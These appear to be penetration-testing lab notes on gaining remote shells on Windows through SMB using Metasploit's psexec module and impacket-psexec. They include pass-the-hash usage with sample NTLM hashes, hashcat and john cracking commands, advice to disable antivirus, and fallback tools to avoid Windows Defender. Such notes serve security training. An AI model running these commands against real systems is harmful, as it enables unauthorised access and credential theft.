• Through Metasploit (Noisy)

  • Enter Metasploit with command: msfconsole

    

  • With a password

    use exploit/windows/smb/psexec
    

    

    

  • With a hash

    use exploit/windows/smb/psexec
    
    Username:RID:LM_HASH:NT_HASH:::
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
    

    

    

<aside> 💡

📝 Windows LM & NT Hashes

🔹 LM Hash (LanMan)

• Weak, used in old Windows versions (NT, XP, 2003).
• Uppercases passwords & splits into 7-character chunks.
• Uses DES encryption (easily cracked).

🔹 NT Hash (NTLM)

• Modern Windows authentication (Win10, Win11, AD).
• MD4 hash of the password (case-sensitive, no splitting).
• More secure but still crackable.

🔹 LM:NT Hash Format

Username:RID:LM_HASH:NT_HASH:::

Example:

fcastle:1000:AAD3B435B51404EEAAD3B435B51404EE:B19D9C88D626F4E1A32425D26A6097E4:::

🔹 Cracking Hashes

✅ LM Hash:

hashcat -m 3000 lm_hashes.txt rockyou.txt
john --format=lm --wordlist=rockyou.txt lm_hashes.txt

✅ NT Hash:

hashcat -m 1000 nt_hashes.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt nt_hashes.txt

The reason why some people say you only need to crack the NT portion of the hash is because of how Windows authentication works. Here’s a breakdown:

🔹 NTLM Hash Structure

A Windows NTLM hash consists of two parts:

• LM (LAN Manager) Hash – Weak and easily cracked (often just AAD3B435B51404EEAAD3B435B51404EE if empty).
• NT (NTLM) Hash – Stronger and more widely used in modern authentication.

🔹 Why Only the NT Hash Matters?

1. Windows uses the NT hash for authentication
   • LM hashes are deprecated in modern Windows versions.
   • NT hashes are used in pass-the-hash (PtH) attacks, where you authenticate without cracking the password.
2. Cracking the NT hash reveals the plaintext password
   • If you need to recover the actual password, you only need to crack the NT portion.
3. Pass-the-Hash (PtH) attacks don’t require cracking
   • You can directly use the NT hash to authenticate (e.g., using mimikatz, crackmapexec, pth-winexe, etc.).

🔹 When Would You Need to Crack It?

• If you want the plaintext password for further attacks (e.g., password reuse, social engineering).
• If Kerberos authentication (Pass-the-Ticket) is not an option, and you need to log in normally.

🔹 Key Takeaways

• LM hashes are obsolete but still found in older systems.

• Crack LM first (if present), then NT for full password recovery.

• Most modern systems disable LM storage by default. 🚀 </aside>

• Through psexec (More subtle)

  • Turn off Virus & threat protection if denied

  • With a password

    impacket-psexec MARVEL/fcastle:"Password1"@192.168.150.130
    

    With complicated password, following will work:

    impacket-psexec MARVEL/fcastle:@192.168.150.130
    

    

  • With a hash

    impacket-psexec [email protected] -hashes LM:NT
    

• Other Options (In case psexec and wmiexec get blocked by Windows Defender):

  • wmiexec

  • smbexec